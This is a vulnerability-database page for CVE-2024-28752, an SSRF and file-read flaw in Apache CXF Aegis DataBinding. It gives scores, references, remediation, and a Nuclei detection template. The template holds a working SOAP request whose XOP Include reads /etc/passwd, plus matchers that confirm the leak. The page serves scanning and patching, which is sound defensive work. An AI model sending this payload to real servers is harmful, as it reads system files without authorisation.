/Vulnerability Library

Apache CXF < 4.0.4 - Aegis DataBinding SSRF / Local File Read

CVE-2024-28752
Verified

Description

Apache CXF before 4.0.4, 3.6.3 and 3.5.8 has a Server-Side Request Forgery (SSRF) vulnerability when using the Aegis DataBinding. The XOP Include mechanism in multipart SOAP requests can be abused to read local files or make server-side HTTP requests to arbitrary URLs. An attacker can use this to access sensitive internal resources.

Severity

High

CVSS Score

7.5

Exploit Probability

51%

Published Date

March 31, 2026

Template Author

maciejklimek

CVE-2024-28752.yaml
id: CVE-2024-28752

info:
  name: Apache CXF < 4.0.4 - Aegis DataBinding SSRF / Local File Read
  author: maciejklimek
  severity: high
  description: |
    Apache CXF before 4.0.4, 3.6.3 and 3.5.8 has a Server-Side Request Forgery (SSRF) vulnerability when using the Aegis DataBinding. The XOP Include mechanism in multipart SOAP requests can be abused to read local files or make server-side HTTP requests to arbitrary URLs. An attacker can use this to access sensitive internal resources.
  impact: |
    An attacker can read arbitrary files from the server and make server-side requests to internal services.
  remediation: Upgrade Apache CXF to version 4.0.4, 3.6.3, or 3.5.8 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-28752
    - https://github.com/advisories/GHSA-qmgx-j96g-4428
    - https://github.com/ReaJason/CVE-2024-28752
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-28752
    epss-score: 0.50829
    epss-percentile: 0.979
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.component:"Apache CXF"
    fofa-query: body="Apache CXF"
  tags: cve,cve2024,apache,cxf,ssrf,lfi

http:
  - raw:
      - |
        POST /test HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/related; boundary=----nucleibound

        ------nucleibound
        Content-Disposition: form-data; name="1"

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://service.namespace/">
           <soapenv:Header/>
           <soapenv:Body>
              <web:test>
                 <arg0>
        <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///etc/passwd"></xop:Include></count>
        </arg0>
              </web:test>
           </soapenv:Body>
        </soapenv:Envelope>
        ------nucleibound--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Unmarshalling Error"

      - type: regex
        part: body
        regex:
          - "cm9vd[A-Za-z0-9+/=]+"

      - type: word
        part: content_type
        words:
          - "text/xml"
# digest: 4b0a00483046022100bc601ee7fddb4c398e39ad84a8d3ce414318a2629f13fe6c8eac6c4716938bd102210084d550ead5cc501a6e522ef60b4d1bdc29f01038dacbcf2e52c7d61e0fa8cbcd:922c64590222798bb761d5b6d8e72950
7.5Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2024-28752
CWE ID:
cwe-918

References

https://nvd.nist.gov/vuln/detail/CVE-2024-28752https://github.com/advisories/GHSA-qmgx-j96g-4428https://github.com/ReaJason/CVE-2024-28752

Remediation Steps

Upgrade Apache CXF to version 4.0.4, 3.6.3, or 3.5.8 or later.